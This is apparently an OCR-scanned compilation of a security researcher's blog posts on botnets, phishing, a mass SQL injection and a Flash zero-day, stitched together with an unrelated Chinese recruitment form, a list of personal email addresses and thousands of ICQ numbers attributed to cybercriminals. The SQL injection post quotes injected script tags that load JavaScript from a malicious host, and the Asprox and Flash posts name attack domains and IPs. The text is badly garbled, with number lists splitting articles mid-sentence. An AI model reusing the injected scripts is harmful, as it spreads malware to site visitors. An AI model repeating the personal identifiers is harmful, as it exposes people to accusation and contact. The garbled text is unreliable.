* Jotas: 
« © echaeges topic te 
* Quits: [Nee|CHN;Se772) (“xP-200GR8 [001 
+ Joins: [OO|USAL79S622] (7XP-1215eD) 
* Quits: 
* Joins: 
* Joins: 
= Jotos: bd 

= Joins: [OB/GRRIGSI765) (~xP-199ZaN centraipivs.con) ae Loniusa) ores, 


Digitally ugly for sure, the point is that this malware campaign has been spreading pretty 
rapidly over MSN and AIM as of recently, and with its success rate so efficiently infecting 
new hosts, that going through chat logs indicates the botnet master’s will to stop spread- 
ing it as there are simply too many hosts getting infected faster than he had anticipated 
at the first place. Ironic, but a perfect example of what happens once the entry barriers 
into a certain market segment of the IT underground have been lowered to the stage where, 
it’s not about having the capabilities, but the motive to embrace the success rate, like this case. 


Botnet masters are also masters in social engineering. Apparently, the success rate for 
this campaign is so high due to its social engineering tactic, which in this case is to establish 
as many touch points with the potential victim as possible, and also, entice clicking on 
a commonly accepted as harmless .php file followed by the victim’s username in a user- 
name@hotmail.com fashion. 


What you see is not always what you get, especially with more and more droppers re- 
questing other malware with image file extensions, which gets locally saved in its real nature - 
%Windir %\Media\System.exe for instance. 
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6. Citation and Reproduction of Academic Achievements 
(No more than 20 items) 


Citation or 


Reproduction 


Title Being Cited or 


* Citation summary refers to number of times being cited, such as “CSSCI 23 times” or 
“SSCI 5 times”. 
** Impact: please use CSSCI or SSCL, etc. to show being indexed by CSSCI or SSCI, etc. 
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7. Academic Communication Skills in Foreign Language. 


Please provide the overseas study, academic visit and courses teaching in foreign 
universities; articles, translations or research reports published in overseas academic 
joummals in foreign language; independent translated and published academic works in 
inside and outside presses; reports, commentaries and seminars in foreign language to 
intemational academic conferences in the past five years; independently all foreign 
language teaching in law courses which included in the teaching plan; and other evidence 
for the academic communication skills in foreign language. 


3. ASSIZN MENS 19 ana Keports (oO Viajor international ang 


Domestic Academic Conferences in the Past Five Years 
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9. Teaching and Graduate Student Supervision in the Past Five 


Years 


Please provide the courses given, number of graduate students supervised, national and 
departmental/provisional teaching award received, and the top 100 dissertations award 
granted to PH_D student supervised by the applicant in the past five years. 


Please explain the working plan and goal conceming teaching and supervision, academic 


research, discipline development, team building and so on. 
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Full List of Academic Achievements 
(No more than 40 items, excluding those listed in table 5) 


Publisher | Publishing 


SCI, ete. 


(If this page is not enough, more pages may be added ) 


Sample personal emails known to be currently recruiting for China’s "Thousand Talents Pro- 
gram": 


wangenvwanghy@nankai.edu.cn 
liuliuweiwei@nankai.edu.cn 
yangjiangyinan@nankai.edu.cn 


nkyangjun@163.com 
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jiaotedacollege@nankai.edu.cn 


xielsxyrs@nankai.edu.cn 


dingxdzhang@nankai.edu.cn 


haohaoyongwei@nankai.edu.cn 


lanecojobs@nankai.edu.cn 


Stay tuned! 


1. https://www.hsgac.senate.gov/imo/media/doc/2019-11-18%20PSI%20Staf f/Z,20Report%20-%20China' s420Talent%20Rec 


itment/20Plans. pdf 


17.4.21 


Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle George" - 
An Update - Collected ICQ, Cryptocurrency, XMPP/Jabber, Phone, QQ, Tele- 
gram and Viber Accounts (2021-04-29 19:25) 


<parent> Darkmoney iHonker ShadowMarket 
11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit._vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell Maul Talk Szuwi 
Aljyyosh Forum Zloy bz Mmpg_ru Tenebris 
Antichat.ru ForumSape Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nulinoss.org Toolbabase se 
BigF ozzy Free-hack pay-per-install org TotalBlackhat 
BlackhatWorld ghostmarket net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehatvn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase WYAV.Opensc.ws 
Crack-F orum Hackersoft scamwarners Xakep.bg 
Cracked to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket la iFud 


Dear blog readers, 


I’ve decided to issue the following update part of my currently ongoing Law Enforcement and 
[1JOSINT Operation called "[2]Uncle George" including a special thanks to McAfee and llya 
Timchenko for taking the time and effort and going through the actual [3]Cybercrime Forum 
Data Set for 2019 including the [4]Cybercrime Forum Data Set for 2021 and producing a vari- 
ety of interesting results in the context of providing personally identifiable information on the 
cybercriminals behind these campaigns. 


In this post I’ll provide a recently collected ICQ numbers list part of my currently ongoing Law 
Enforcement and OSINT Operation "[5]Uncle George" for the purpose of assisting U.S Law En- 
forcement on its way to track down and prosecute the cybercriminals behind these campaigns: 
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A currently active list of ICQ numbers belonging to high-profile cybercriminals part of my 
currently ongoing Law Enforcement and OSINT Operation called "Uncle George": 


0445162421 
0634113561 
10000009 
100000555 
100000992 
100001010 
100001020 
1000083 
1000168 
1000223 
100050 
1001001 
100100941 
1001015 
10011005 
100200 
100214 
100233 
1002705 
1003179 
100321 
100500 
100650 
100700 
100705 
100706 
10071073 
100732 
100767 
100771 
100783 
100793 
100795 
100813 
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100814 
100823 
100843 
1008885 
100889 
101010610 
10101181 
101033 
101089498 
101105103 
101110011 
1011220 
10126 
1012664 
101306875 
101338 
10136 
1015305 
10193892 
10200000 
102032 
1020324 
102102201 
102319 
102501 
102688230 
1028122 
10282 
10310092 
103106203 
103109 
10314 
1032104 
1033359 
10340 
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10355 
1035758 
10418 
1041990 
1042751 
10430010 
104345440 
10440 
1044437 
104460 
10475 
10483 
104967 
105048784 
1050994 
10512 
105359 
1053969 
105444 
10578976 
1058053 
1058087 
105875912 
106026674 
10625 
106306 
10637116 
106555777 
106607 
1066074 
1067963 
106809 
10700000 
107123063 
107123963 
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4.5.27 A Review of Hakin9 IT Security Magazine (2008-05-26 10:24) 


CD useful applications « video tutorial + 7 unique IT security articles 


Hacking Postgres 


thhenticaton ar 


Bypassing Security Systems 
Jc O r 


How to Break into Corporate Systems a 


A new issue of the [1]Hakin9 - Hard Core IT Security Magazine is "in the wild", and since the 
editorial staff has been kind enough to provide me with issues of the magazine for a while 
now, in this post I'll review the latest issue with the idea that constructive confrontation leads 
to the best output achievable. 


There are many different ways to review a magazine, however, I’m always sticking to 
the following critical success factors for a quality magazine : 


- The presence of a vision 

While a vision is often taken for granted, or even worse, a mission gets misunderstood for a 
vision, in Hakin9’s case the vision could be perhaps best rephrased as "Spoiling the geeks who 
beg for a nerdy talk to them". 
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10747 
1075766 
107706501 
107716 
1080166 
108028654 
108088 
108090 
10842193 
108494948 
108661045 
108752 
109000617 
109320533 
109548179 
109640 
109650152 
109676 
10980449 
1099655 
109992 
110000000 
110008200 
11012021 
11012101 
11092001 
11093425 
111000666 
111000724 
1110709 


1111111111 
1111111111119 


111111114 
11111112 
111111165 
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11111123 
111111238 
1111119 
111115818 
111116143 
11113313 
1111424 
1111567 
111162535 
1111718 
111188118 
11119480 
1111995 
1112072 
111211611 
1113064 
1113435 
111518215 
111538 
111567311 
1116075 
1116351 
11165000 
11169169 
11174777 
111833551 
111856 
11188907 
111932999 
1119916 
112075 
11209945 
1121959 
11221 
11221321 
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1122514 
112271 
112300300 
1125992 
112724353 
112929 
11294942 
113032362 
11321132 
113222 
113273 
1133311 
113337795 
113371337 
11366311 
113773 
1139892 
114093765 
114136092 
114262 
114618357 
114994 
1151111 
115141410 
1151506 
115358955 
115389 
115472 
115557 
115649 
1156494 
115695 
1157000 
115949613 
115959836 
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116119 
116167 
116317 
116377875 
11666699 
11700000 
11700766 
117119 
117247023 
117543 
117572236 
11777 
11777101 
117837474 
118013 
118181811 
118554135 
118608 
118628520 
118815657 
1188337 
118888307 
11889888 
118915 
118947117 
119021 
1190557 
119090616 
1191032 
119247 
1195766 
119739 
119849 
119997 
120016 
15266 


1200186 
120085 
120130 
120353 
120619921 
1206782 
120826750 
120923353 
121005 
1210540 
12111 
12121212 
1212216 
121231532 
121270671 
12143 
121430 
1215215 
121565 
121644 
121911863 
12215512 
1222049 
1222279 
122247777 
12227211 
12233330 
122336844 
122347828 
1223956 
122559 
122654 
122790219 
122930300 
122985 
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12300017 
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- Content quality 


The magazine truly delivers what it promises, namely, hardcode content in sections such 
as tools review, basics, attack, defense, book reviews, consumers test, and interviews. And 
whereas the key topic in this issue is LDAP cracking, | really enjoyed the Javascript obfuscation 
article, with the practical examples provided. A bit ironic, the issue is also reviewing a com- 
mercial source code obfuscator, which just like legitimate anti-piracy tools used by malware 
authors to make their binaries harder to analyze, can also be abused for malicious purposes. 


- Relevance of information 


The information provided in the articles is highly relevant, and timely, lacking any retrospec- 
tive approaches and focusing on current and emerging threats only. The same goes for the 
extensive external resources provided, emphasizing on the importance of self-education. 


- Layout 


Very well structured, and so far | haven’t come across an article where the images weren’t 
syndicated the way they should be, for instance the figures mentioned on a certain page, 
are the same figures available at that page. Three differentiation points make a very good 
impression, the level of difficulty for the article, what you should know before reading it in 
order to understand it, and what you will know after reading it, which you can find at the end 
of every article. 


- Visual materials 

The surplus of visual materials is perhaps what won me as a reader from the first moment. In 
fact, the issues are so rich on visual material illustrating the topic covered in such details, that 
you can actually take entire sniffing, and javascript obfuscation sessions offline with you, and 
never ever have to picture the output of a certain process in your mind again. 


- Ads 


Highly targeted, and primary security related, and best of all, very well spread across the 
magazine, so you’re exposed to more content than ads. 


Overall, the magazine successfully delivers what it promises to deliver - hardcode technical 
content from the geeks, for the geeks. Informative reading! 
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Last week, the 2008’s [1]W2Sp workshop held in Oakland, California and sponsored by the 
[2]IEEE Symposium on Security and Privacy, made available all the papers from the workshop, 
including catchy titles such as : 


- [3]input type="password" must die! 

- [4]Web Authentication by Email Address 

- [5]Beware of Finer-Grained Origins 

- [6]On the Design of a Web Browser: Lessons learned from Operating Systems 
- [7]Analysis of Hypertext Markup Isolation Techniques for XSS Prevention 

- [8]Privacy Protection for Social Networking Platforms 

- [9](Under) mining Privacy in Social Networks 

- [10]Building Secure Mashups 
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- [11]Web-key: Mashing with Permission 

- [12]Private Use of Untrusted Web Servers via Opportunistic Encryption 
- [13]Evidence-Based Access Control for Ubiquitous Web Services 

- [14]Privacy Preserving History Mining for Web Browsers 

- [15]Towards Privacy Propagation in the Social Web 


Information is not free, it just wants to be free. 
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11 
12. 
13. http://seclab.cs.rice.edu/w2sp/2008/papers/sp1 .pd 
14. http://seclab.cs.rice.edu/w2sp/2008/papers/sp3.pd 
15. http://seclab.cs.rice.edu/w2sp/2008/papers/sp5.pd 
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237295387 
237330059 
2374118 
237502 
237559 
23759519 
Paw ee ANG | 
2377490 
23777797 
23781247 
237812472 
2379032 
238222747 
15298 


2382381 
238496 
238552677 
238581000 
238719 
238726537 
238753 
238874153 
239149862 
239215 
239252 
239316 
2393459 
239366548 
239377 
2393936 
239442 
239730529 
2397867 
239910211 
240152525 
240198825 
240399231 
240462010 
240596 
240600072 
240891 
241056758 
241091072 
241171635 
241187 
241381 
2413830 
241427 
241757076 


15299 


241855130 
241903533 
242036 
242200 
242244224 
242273 
242363 
242374503 
242402 
242446812 
242547 
242622 
242665 
242812064 
2428227 
242952088 
2431024 
243125553 
2434151 
243435994 
243444 
244176075 
2441913 
244261 
244342473 
2444300 
24444198 
244483225 
244511758 
244592678 
244622222 
244689062 
244771821 
245000183 
24501155 
15300 


245070964 
245076644 
245168602 
2455980 
245678 
2457000 
245903 
245919 
245936 
246099658 
246236 
246262074 
246499 
246553 
246630130 
246666561 
246873302 
246903 
247328 
247517674 
247586 
247741 
2480220 
248257 
248271885 
2483528 
2483529 
248571667 
248602421 
248801588 
2490961 
249205163 
24933548 
249455439 
249602359 
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249621634 
249641955 
249758529 
249767 
249800954 
249894 
2499736 
249973682 
250048 
250154956 
250196100 
250250500 
250349430 
250668660 
250708123 
250800509 
250979 
251125 
25112517 
251243143 
2513017 
251383 
251407979 
251416580 
2521521 
2522231 
252240463 
252242 
252253486 
2522969 
252371632 
252525355 
252647530 
252970 
253050 
15302 


4.5.29 Yet Another Massive SQL Injection Spotted in the Wild (2008-05-26 17:58) 


KCSG the number 1 Televison Ne<script src=http://www.chliyi.com ... 

<script src=http://www.chliyi.com/reg.js></script> ... Contact Us<scnpt src=http://w<script 
src=http://www.chliyi.com/reg.js></script> ... 

www.kesg.com/ - 84k - Cached - Similar pages - Note this 


Comics Village - Form and Void<script src=http://www.chliyi.com ... 

<script src=http://www.chliyi.com/reg.js></script>. 20/05/2008 03:05:00. Users Avatar ... [b] 
MlS<script src=http://vwww.chliyi.com/reg.js></script> ... 
www.comicsvillage.com/column.aspx?ArticlelID=274 - Similar pages - Note this 


American First Ladies<script src=http://www.chliyi.com/reg.js></script>, Watson, Robert 
P., ed<script src=http://www.chliyi.com/reg.js></script>, 2002 ... 
www firstladies org/bibliography/index.aspx?firstlady=11 - 44k - 


Cached - Similar pages - Note this 


An international team of biologists, natural resource managers, economists, and policy 
makers is organizing to prepare a global strategy for addressing the .. 
www.gisp.org/ - 19k - Cached - Similar pages - Note this 


Science Scotland Homepage<scri<script src=http://www.chliyi.com ... 
About Us | Register | Feedback | Site Map | Privacy Statement - FORTHCOMING EVENTS 
REGISTER FOR THE SCIENCE SCOTLAND NEWSLETTER .. 

www.sciencescotland.org/ - 10k - Cached - Similar pages - Note this 


Armor WeldBlock from Rockwell<<script src=http://www.chliyi.com ... 


This site may harm your computer. 
Armor WeldBlock from Rockwell<<script src=http:/Avwew.chliyi.com/reg.js></script><script 


src=http://www.adw95.com/b.js></script><script .. 
www.indiantextilejoumal.com/products/PRdetails.asp?id=184 - Similar pages - Note this 


Exhibitions<script src=http:/www.chliyi.com/reg.js> </script> 
the.gallery@oxo exterior<script src=http://www. Bargehouse Brighton University<script 
src=http://www.chliyi.com Bargehouse fashion show<script ... 
www.coinstreet.org/exhibitions.aspx - 36k - Cached - Similar pages - Note this 


Another [1]SQL injection attack was spotted in the wild during the last couple of hours, and 
while it continues remaining active, surprisingly, the malicious domain is not in a fast-flux. As 
I’ve already pointed out, the upcoming SQL injection attacks for the next couple of months, 
will be primarily executed by copycats, where among the few differentiation factors left is 
[2]increasing the survivability of the domain. 


In the particular attack, the injected domain chliyi.com /reg.js loads an iFrame to chliyi.com 
/img/info.htm where a VBS script attempts to execute by exploiting MDAC ActiveX code execu- 
tion (CVE-2006-0003), whose detection rate is 1/32 (3.13 %) and is detected as Mal/Psyme-A. 
Approximately, 8,900 sites have been affected. 


1. http: //ddanchev. blogspot . com/2008/05/malware-domains-used-in-sql-injection.htm 


2. http://blogs.zdnet .com/security/?p=1122 
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253085 
253198856 
253241058 
253442235 
2535374 
253572284 
253786 
253790 
253800 
253871667 
253896 
254076442 
254129 
254214 
254222222 
254287 
254344994 
254569 
254633 
254654 
254712751 
2547900 
254973717 
2550382 
2551717 
255265156 
255570 
255702 
255856 
255895580 
255912801 
255974 
2559985 
2560382 
256348638 


15303 


256409840 
256411418 
256519 
256547384 
2567649893 
256925 
257060281 
257153 
257263237 
257290890 
257326502 
257353 
257401750 
257413314 
2575464 
257579 
257617846 
2579993 
258022 
258065 
258143927 
258165745 
258183169 
258221816 
258348 
258462258 
258585565 
258796890 
258888891 
258933 
2589635 
259014525 
259076257 
259138187 
259313658 
15304 


259320 
259422 
259544209 
259753816 
259952243 
259953 
260006 
260103456 
260224883 
26030 
260326660 
260414 
260430890 
2605009 
260923339 
260937796 
261438384 
261468244 
261484259 
261562181 
261646362 
261816226 
261860 
261900303 
261961 
261976 
2621016 
262164 
262287 
262298800 
26242030 
262442 
262522358 
262535258 
262607025 
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262626 
2626260 
262628811 
262673141 
262934 
263189241 
26333334 
263338 
263341369 
263479 
2634803 
263522933 
263671 
263834 
264123868 
264210 
264257 
264313652 
264625168 
264625169 
264666 
265752736 
265829724 
265837525 
2660100 
266116 
266334734 
2664000 
266444 
266456 
266540178 
266666 
266677 
266811997 
266940 
15306 


266940414 
2669678 
267027 
267042 
267203984 
267403912 
267478384 
267652 
267775131 
267834165 
267866 
267895 
267899424 
268086 
268086255 
268137166 
268222047 
2686694 
268696151 
2687022 
268737593 
268803846 
268850377 
269037227 
269042685 
269065 
269082060 
269169 
269228014 
269250828 
26926229 
269593282 
269663281 
269893 
269931 
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2700642 
270118192 
270266 
270301 
270343976 
270529734 
270561336 
270667 
271120281 
271356478 
271381149 
271571179 
271586967 
271717692 
271777227 
271920213 
271928 
272089407 
2721081 
272174941 
2722327 
272286 
2723733 
272467978 
272695228 
272724929 
2727372 
272929821 
272940089 
273035594 
273147975 
273187309 
273374730 
274019538 
274113 
15308 


274294070 
274304485 
274318228 
27442472 
274487 
274581477 
274613 
274648 
274917 
27511806 
275129 
275135 
275145155 
275200758 
275215 
275266829 
27536 
2754554 
275545732 
275577471 
275801577 
275852004 
275877146 
2760008 
276329352 
276674678 
27667869 
276820112 
276886 
276948876 
2770998 
277132 
277135871 
277279277 
2773111 
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277337 
277339 
277401757 
2774213 
277444 
277506 
277625523 
277726006 
2777469 
277758582 
277767 
277777777 
277841 
277954169 
278109632 
278356 
278398 
278571978 
278660 
278715563 
278748 
278788713 
279032218 
279105595 
279237 
2794444 
279613533 
279678831 
279727729 
279787106 
279818640 
279993 
280086454 
280325 
2803876 
15310 


280450298 
2805078 
280543360 
280655261 
280838173 
280864317 
280865691 
280938 
281066570 
281077822 
2814559 
281568724 
281635375 
281663402 
282200017 
2824867 
282500532 
282522351 
282583484 
282644 
282706 
282789 
282886909 
282972370 
283078 
283089483 
283141590 
283143 
283143783 
283207176 
283281 
2833388 
2833923 
283492 
2836559711000 
15311 


283740807 
283821162 
284177 
284343444 
284404318 
284576572 
2845987 
284651610 
284685388 
284711108 
284758224 
284842637 
284897198 
285265 
285386 
285515687 
285600790 
285615253 
285701121 
285706883 
285782 
2858833 
286153948 
286176061 
286370715 
286428759 
286573259 
286904927 
286958078 
287103183 
287231125 
287276967 
287468 
287520191999 
287655732 
15312 


4.5.30 Asprox Phishing Campaigns Dominated in April (2008-05-27 12:50) 


1 fj.cn (549) 1 212.174.25.241 (1,715) 

2. altervista.org (409) Z 62.233.145.45 (1,627) 
bankofamerica.com (271) 3 218.92.205.246 (1,355) 
by.ru (171) 4 85.105.182.6 (1,033) 
jl.on (116) : 212.0.85.6 (817) 
dittechusnfotk93.cn (113) 6 193,33.61.2 (790) 
zj.cn (99) > 217.119.57.19 (649) 
filestackO7.net (92) S 209.172.59.193 (635) 
xj.on (79) 9 89.255.3.132 (437) 
9k.com (74) 1 192.138.181.110 (271) 

Networks That Host Phishes 


The servers hosting verified phishes are under the responsibility of these networks. PhishTank knows this because it traces 
phishing Web sites to an IP address. These are the organizations responsible for those IP addresses. 


Top 10 Networks Valid Phishes 
TTNET TTnmet Autonomous System 2,870 
Futuro Poland Autonomous System 1,627 
No.31,Jin-rong Street 1,407 
Plus.Line AG IP-Services 866 
ru.burnet Autonomous system 817 

t PANTHERIT Panther IT Services 790 
synergetic AG Medien: und Systemtechnologie 650 
Groupe iWeb Technologies inc. 650 

9 ThePlanet.com Internet Services, Inc. 462 

10 TrueServer BY AS number 441 


According to [1]the latest report from the Phishtank, a great resource for OSINT data, five IPs 
were hosting 6547 phishing campaigns in April, all of which are courtesy of the Asprox botnet, 
a botnet that despite being actively sending phishing emails for the last couple of months, 
received more publicity for its introduction of SQL injection capabilities, like the ones I’ve 
assessed in a previous post. The IPs in question : 


212.174.25.241 
62.233.145.45 
218.92.205.246 
85.105.182.6 
212.0.85.6 


Where’s the connection? It’s in the historical domains that used to respond to the IPs, 
in the Asprox case, a great deal of the original domain names used a couple of months ago 
are still in a fast-flux and further expose and connection between these IPs and Asprox. For 
instance, 62.233.145.45 , 


is known to have been hosting 
1534 


287746 
2880055 
288068 
288118514 
288236 
288643668 
288697443 
288777778 
288781758 
288828 
2888534 
288883644 
288887 
28888856 
288888800 
28898292 
289012 
289224305 
289235301 
289520851 
289899 
290000200 
290277486 
290381 
290393 
290464 
290534471 
290549 
2906262 
290685 
291024463 
291098 
2911115 
291149 
2911701 


15313 


291250323 
291292 
291353923 
29144 
291449782 
291598169 
291605741 
2916151 
2916756 
291675620 
291776504 
2918031 
291921 
291934275 
291963 
291994264 
2920067 
292029 
292222 
2922233 
292243 
292282054 
292341293 
292487547 
292535234 
292707 
292727787 
292750767 
2928506 
292929 
293124242 
29343485 
29344392 
293613081 
294192688 
15314 


294292787 
294338602 
294364 
294388279 
294426828 
29448761 
294588 
294595315 
2949001 
294904235 
295047470 
295112380 
295365607 
2935019 
295536697 
295537634 
295550922 
295619 
295917 
295924 
295939921 
296367 
2963994 
296636080 
296686 
296688 
29670131 
296701311 
296869 
29705130 
297204939 
29755555 
297585644 
297747 
297750 


15315 


29777772 
298175 
298267391 
298271165 
298311 
298457148 
298471865 
298659752 
298659907 
298728606 
298771273 
29878987 
298825323 
2990426 
299113477 
299144 
299195033 
299207 
2992766219580760 
29929588 
29931293 
299457 
299494 
299508 
299597 
299599399 
299803871 
2999195 
300000177 
3000005 
300003698 
3000320 
300041101 
3000678 
300070000 
15316 


300075857 
300101259 
300143 
300151499 
3001593 
300226514 
300299326 
300321831 
30036736 
3004229988 
30048342 
300782756 
300890 
301013 
301165512 
301217777 
301303 
3017275 
302024 
302032 
302129670 
302181 
302337635 
302755 
3028500 
303043564 
303050021 
3032361 
30333222 
303497670 
303539234 
303654 
303737 
30374092 
304044855 


15317 


304049 
3042241 
304234207 
30427777 
304355137 
304432165 
3044434 
304733463 
304811 
304845431 
304913412 
304972431 
305009 
305347 
305377 
3054308 
305499 
305500179 
305512511 
305579 
305659 
305732681 
305932413 
30599559 
306182 
306185916 
306217212 
306396 
306739 
307027954 
307066573 
307130 
307177437 
307182 
307244831 
15318 


307253 
307440 
3075982 
307694629 
307773615 
308129922 
308194443 
308332273 
308389074 
308427789 
308468038 
308598 
308606089 
308622179 
308772133 
308850 
308864 
30899999 
309099 
309351 
309368341 
309490911 
309654 
3097123 
309730602 
309755881 
309860 
309971 
309994 
3100228 
310040 
310075570 
3101265 
310311304 
310369 


15319 


3105274 
31057100 
310695 
31077773 
310934 
310944310 
311059363 
311111111 
3111173 
311142437 
311147 
311222 
311240213 
311252 
311333333 
311582 
311728 
311750 
311833 
311911 
311922021 
3121330 
3121370 
3122952 
312298513 
312325485 
312351360 
312795711 
312863086 
313006596 
3130432 
313113133 
31313 
313137 
313148549 
15320 


31315656 
313191513 
313202731 
3133204 
313320424 
313321 
31337 
313437867 
313816117 
3139206 
313958762 
313982 
313992160 
31415 
314266131 
314358411 
314417 
314631222 
314757 
314825765 
314941685 
3149416854 
315194493 
315314012 
3153282 
31541941 
315435866 
315533206 
3155531 
315625299 
315884 
315891304 
315912805 
315925485 
316090 


15321 


316110 
316229 
3162292 
316347032 
316516845 
31662003 
316735332 
316746 
316791987 
316817 
316850301 
316951120 
316996655 
317077787 
317117 
317188148 
317418 
317437772 
317495 
317567848 
317606 
317781638 
317825726 
3178334 
3178384 
317973149 
31798 
317997677 
317998552 
318031 
318443 
318446 
3188195 
31904 
319040 
15322 


xml52.com ; www5.yahoo.american-greeting.ca.xmI52.com ‘ ya- 
hoo.americangreeting.ca.www05.net ; bendigobank.com.au.tampost5.ws ; among the 
domains used in some of the previous phishing domains. The rest of the IPs are also known to 
have participated in the fast-flux, and therefore, as long as they remain using some of their 
old domains, and fast-flux them in a way that can be compared to the data from previous 
months, monitoring the prevalence of Asprox phishing campaigns and making the connection 
between a phishing campaign and the botnet, would remain easy to do. 


Related posts: 


[2]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
[3]lnside a Botnet’s Phishing Activities 

[4]Fake Yahoo Greetings Malware Campaign Circulating 

[5]Phishing Emails Generating Botnet Scaling 


1. http://www. phishtank.com/stats/2008/04/ 
2. http://blogs .zdnet .com/security/?p=1122 


3. http: //ddanchev. blogspot . com/2008/02/inside-botnets-phishing-activities.htm 


4. http://ddanchev. blogspot . com/2008/04/fake- yahoo- greet ings-malware- campaign. html 


5. http: //ddanchev. blogspot. com/2008/04/phishing-emails-generating- botnet .htm 


4.5.31 Malware Attack Exploiting Flash Zero Day Vulnerability (2008-05-27 22:37) 


It’s been a while [L]since we’ve last witnessed malware attacks using zero day vulnerabilities, 
and the latest one exploiting a zero day in Adobe’s flash player is definitely worth assessing. 
The current malware attack has been traced back to Chinese blackhats, who are using a 
zero day to infect users with password stealers, moreover, one of the domains serving the 
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319054420 
319098570 
319120014 
319355 
319467306 
3195178 
319881513 
320087115 
32030320 
320604 
32071 
3207123 
32072 
320748 
320797227 
320858715 
3210000 
321100000 
3211164 
321221222 
321303473 
321315 
321355571 
321440 
3216441 
321666801 
321687166 
3216889 
321702 
32173413 
321885971 
321923 
32211001 
3222222 
32222242 
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322225588 
322275203 
322613 
322634089 
322723957 
323077 
323373 
323446726 
323493805 
323688318 
323919046 
324123151 
324134 
324266269 
3242966 
324323283 
324660 
324662098 
324665 
324727920 
324851350 
324955825 
324966688 
325007387 
325008425 
325212722 
325324997 
32551 
325577165 
325701 
325955324 
326026 
326268589 
326469463 
326567297 
15324 


326638 
326654019 
326921 
32697264 
327187948 
3272320 
327266126 
327280391 
327293 
327399934 
327496932 
3275222 
327579694 
327580600 
327623 
327655609 
327667183 
327777 
327835 
32802174 
328186283 
328256 
328412422 
328487510 
328555555 
328709637 
328736806 
328754033 
329230 
329383 
329436 
329438141 
329814 
329955591 
32999994 
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330046337 
330084 
3300890 
330164453 
330214 
3303033 
330333000 
330393 
330444 
330474 
330577164 
3306219 
330636915 
3307039 
330725 
330904256 
331237326 
331243 
331276184 
331277 
331277962 
331313331 
331382374 
331446617 
331500343 
331504 
331630640 
331644784 
331691618 
331697586 
3317159 
S31 ITT 
331833333 
331892 
331906 
15326 


332125132 
332189713 
332201678 
332212 
332217 
33223020 
33223222 
332277 
332280 
3322963 
3323329 
332342 
332344538 
332356417 
332507 
332611475 
332678 
332683386 
3327772 
333002097 
3330033 
333099990 
333101355 
33319963 
333224590 
33330166 
3333229 
333333353 
333333393 
333335069 
333336363 
333340248 
3333624 
333365099 
333374966 
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333383337 
33338989 
3334470 
333511 
333730828 
333752 
333778 
3337888 
333882886 
333900 
333938460 
334072 
334109706 
334141143 
334161 
334187 
334196 
334222 
334240 
334287781 
334331 
334449009 
3344663 
334538398 
335065 
335205 
33535674 
335470 
335529743 
33555572 
335582718 
335625 
335656883 
335746788 
335950 
15328 


336133571 
336140145 
336223270 
336281 
336311 
336379137 
336384102 
3364023 
336504 
336511528 
3366336 
336646663 
336922412 
33713790 
33714428 
33737337 
337433791 
3374488 
337617 
337621458 
337623810 
33780048 
337836048 
337871 
337958 
338198557 
338272216 
338276286 
33835855 
338401480 
338555382 
338600429 
338614 
338713152 
338852734 


15329 


338894067 
339010 
339025 
33903 
339151 
339310 
339399 
339461564 
3395357 
339574039 
340034 
340068107 
340112 
340258254 
3402777 
340538840 
340540271 
340677740 
340862572 
34093409 
341065628 
341100847 
341298099 
34139802 
341406954 
3421905 
342250 
342258374 
342276 
3422782 
342464 
342555114 
342644 
342660457 
34266150 
15330 


342710 
34282652 
342835257 
3428606 
3430009 
343009 
343123179 
343343 
343361116 
343410 
343411645 
3434333 
34343434 
343498261 
343552 
343868902 
343874 
344000813 
34433434 
344335415 
344388029 
3444338 
3446111 
344641372 
344738451 
344744 
344821243 
3450303 
345094567 
34535 
345454214 
345472044 
345538570 
345541 
345544813 


15331 


34565677534 
3456687 
3456812 
345886539 
345909065 
34598875 
346082 
346211611 
346214 
346225 
346333 
3464710 
346543231 
3465468 
346602 
346607 
346679153 
346888 
346905544 
3470670 
347135958 
347235 
347344 
347417840 
347542 
347542094 
347710104 
347736300 
347828136 
34846571 
348474023 
348550986 
348557709 
348708 
348711424 
15332 


Adobe zero day has been sharing the same IP with four of the malware domains in the recent 
waves of [2]massive SQL injection attacks, indicating this incident and the previous ones are 
connected. [3]According to Symantec : 


" Preliminary investigation suggests that the DeepSight honeynet may also have cap- 
tured this attack. We are looking into this further. Currently two Chinese sites are known to 
be hosting ex 


ploits for this flaw: wuqing17173.cn and woail17.cn . The sites appear to be exploiting the 
same flaw, but are using different payloads. At the moment these domains do not appear 


to be resolving, but they may come back in the future. Network administrators are advised 
to blacklist these domains to prevent clients from inadvertently being redirected to them. 
Avoid browsing to untrustworthy sites. Also, consider disabling Flash or use some sort of 
script-blocking mechanism, such as NoScript for Firefox, to explicitly allow SWFs to run only 
on trusted sites. " 


The Internet Storm Center also [4]made an announcement and assessed a [5]malware domain 
that was using the exploits in this case playOnInie.com (125.46.104.172), next to [6]Adobe’s 
Product Security Inci[7]dent Response Team (PSIRT) original announcement of the vulnerability. 
What about the original hosting sites for this exploits? Are they still active and serving it, 
what are the detection rates of the exploits and the malware served, and are there any other 
domains that should be blocked, also responding to the same IPs. 


Let’s assess the campaign using the [8]Adobe Flash Player SWF File Unspecified Remote 
Code Execution Vulnerability. At countl18.wuging17173.cn/click.aspx.php (58.215.87.11) the 
end user is receiving a look looks like a 404 error message, however, within the 404 message 
there’s a great deal of information exposing the exploits location and participation domains, 
which you can see attached in the screenshot above. In between several obfuscations we are 
finally able to locate the exploits serving host, as there are multiple exploits this particular 
campaign is taking advatange of, in between the Adobe Flash Player one : 


1536 


348763 
348795453 
348982 
349058915 
349111934 
34937533 
349596 
349886336 
349893468 
349945303 
349964403 
34999991 
35000 
350012003 
350040995 
350208245 
350240479 
350354262 
350571 
350639 
350655 
350695228 
350746 
350777500 
350868922 
350919275 
350970596 
351034 
351174402 
351234 
351281 
351292943 
351324813 
3513535 
351426402 


15333 


351440 
351475747 
351476609 
351576183 
351608926 
351787608 
3518423 
351933412 
352040036 
3520572 
352180475 
352252184 
352285993 
352443 
352454357 
35245910 
352590 
352677226 
352775544 
352807939 
352846077 
